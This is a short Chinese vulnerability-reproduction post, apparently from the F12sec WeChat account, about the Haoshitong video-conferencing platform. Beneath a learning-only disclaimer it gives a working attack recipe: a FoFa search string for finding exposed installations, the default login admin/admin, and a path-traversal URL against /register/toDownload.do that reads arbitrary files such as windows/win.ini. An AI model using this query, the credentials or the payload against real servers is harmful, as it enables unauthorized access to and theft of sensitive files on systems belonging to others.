前言
申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
Part.1 漏洞背景
好视通云会议是一款高效、便捷、低成本的网络视频会议产品,通过电脑或手机登录好视通云平台,便可快速地与全球各地团队进行实时音视频沟通,并可同步分享各类数据文档。
Part.2 漏洞描述
好视通视频会议平台存在弱口令及前台任意文件下载漏洞。
可获取任意敏感文件信息。
Part.3 漏洞影响范围
Copyright © 2013-2018
Part.4 FoFa语法
"深圳银澎云计算有限公司"
Part.5 漏洞复现
admin / admin
漏洞url:
/register/toDownload.do?fileName=敏感文件路径漏洞复现:
https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
复现成功!
那就长按二维码,关注我们吧!
漏洞复现 | (通用0day)某实践教学平台存在通用SQLi漏洞
漏洞复现 | Microsoft Windows10 本地提权漏权 CVE-2021-1732
漏洞复现 | (通用0day)金和C6协同OA管理平台后台存在水平越权漏洞
本文始发于微信公众号(F12sec):漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论